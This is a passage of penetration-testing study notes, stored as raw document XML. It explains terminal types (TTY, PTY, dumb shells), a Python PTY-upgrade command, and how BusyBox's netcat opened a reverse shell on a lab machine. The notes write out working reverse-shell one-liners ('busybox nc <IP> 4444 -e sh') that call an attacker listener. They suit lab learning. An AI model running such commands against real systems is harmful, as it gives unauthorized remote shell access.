      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_e7ck8gjg5204" w:id="124"/>
      <w:bookmarkEnd w:id="124"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Reverse Shell Types Explained</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E6B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1243"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">TTY (real terminal)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E6C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1243"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">REAL </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">terminal, like the normal terminal</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E6D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1243"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Used when you're physically or virtually logged into a system.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E6E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1243"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Examples: console login, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SSH session</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E6F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1243"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Gives full interactive control.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E70">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1243"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PTY (pseudo-terminal)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E71">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1243"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Software emulation of a TTY.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E72">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1243"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Used when a program needs terminal features but no real terminal exists.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E73">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1243"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Since it's impossible to upgrade from rev shell to TTY, we have to upgrade to PTY instead</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E74">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1243"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Example: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">python3 -c 'import pty; pty.spawn("/bin/bash")'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E75">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1243"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Reverse Shell / Weak Shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E76">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1243"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The connection you get from ncat</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E77">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1243"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Lacks basic features</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E78">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E79">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to test if you have tty/pty:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="653"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tty</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E7B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="653"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If it says something like /dev/pts/0 → you have a PTY/TTY</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E7C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="653"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If it says not a tty → you’re in a dumb shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E7D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="653"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">But you can usually just tell from using it</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E7E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E7F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E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1">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_r74qrsqbsv9i" w:id="125"/>
      <w:bookmarkEnd w:id="125"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Busybox</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E82">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E83">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Busy Box is basically a single lightweight binary that bundles tons of common Linux utilities into one file. This includes sh, ls, nc, and cat.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E84">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E85">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For example:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E86">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1007"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">busybox nc 192.168.45.232 4444 -e sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E87">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1007"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Note that the</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -e sh </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">flag is specific to</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> nc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E88">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1007"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Basically, the normal payload would be: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nc 192.168.45.232 4444 -e sh</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E89">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1007"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And we are basically just adding "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">busybox</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" to start</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E8A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1007"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">VERY EASY TO USE!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E8B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E8C">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Also for XXXXXXXXX-B, it was seen twice, and in both cases, nc was actually installed in both machines, and yet we were unable to use it to get a foothold into the machine. But busybox's nc did work. Idk why using the normal nc didn't work though</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E8D">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E8E">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And also note that busybox is not always installed. If you have command execution you can check via:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E8F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1043"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">which busybox</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E90">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1043"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Should be </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/busybox</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E91">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E92">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here is snippet of XXXXXXXXX-B .150 which used Busybox when none of the reverse shell stuff worked"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E93">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E94">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="781"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I couldn't get nc, bash, or ping to work. So I looked at discord and we had to use this tool called </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">busybox</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. BusyBox is basically a single lightweight binary that bundles tons of common Linux utilities into one file. This includes sh, ls, nc, and cat.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E95">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="781"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So, we could use this to get a reverse shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E96">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="781"/>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busybox nc 192.168.45.232 4444 -e sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E97">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="781"/>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busybox nc</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is how to use nc</w:t>
      </w:r>
    </w:p>
